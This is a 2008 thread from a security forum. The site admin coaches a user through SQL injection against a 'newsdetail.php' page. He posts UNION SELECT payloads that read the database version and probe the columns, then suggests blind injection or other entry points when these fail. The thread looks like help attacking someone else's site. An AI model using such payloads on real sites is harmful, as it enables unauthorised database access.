|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 87
Members: 0
Total: 87
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
sQL injection Help |
|
Posted: Thu Oct 30, 2008 8:54 pm |
|
|
fadai |
Regular user |
|
|
Joined: Oct 30, 2008 |
Posts: 11 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Oct 31, 2008 12:06 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You don't need single quotes in this case.
Try:
Code: |
newsdetail.php?NewsDetail=-1+UNION+ALL+SELECT+@@version--+
|
|
|
|
|
|
Posted: Fri Oct 31, 2008 2:56 pm |
|
|
fadai |
Regular user |
|
|
Joined: Oct 30, 2008 |
Posts: 11 |
|
|
|
|
|
|
|
Still Nothing I dont see any output |
|
|
|
|
Posted: Fri Oct 31, 2008 5:19 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try:
Code: |
newsdetail.php?NewsDetail=-1+UNION+ALL+SELECT+1,2--+
|
Do you see error message? |
|
|
|
|
Posted: Fri Oct 31, 2008 7:34 pm |
|
|
fadai |
Regular user |
|
|
Joined: Oct 30, 2008 |
Posts: 11 |
|
|
|
|
|
|
|
waraxe wrote: | Try:
Code: |
newsdetail.php?NewsDetail=-1+UNION+ALL+SELECT+1,2--+
|
Do you see error message? |
no Error |
|
|
|
|
Posted: Fri Oct 31, 2008 7:50 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Then try some blind injection methods. Or look for other sql inj issues in same website. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|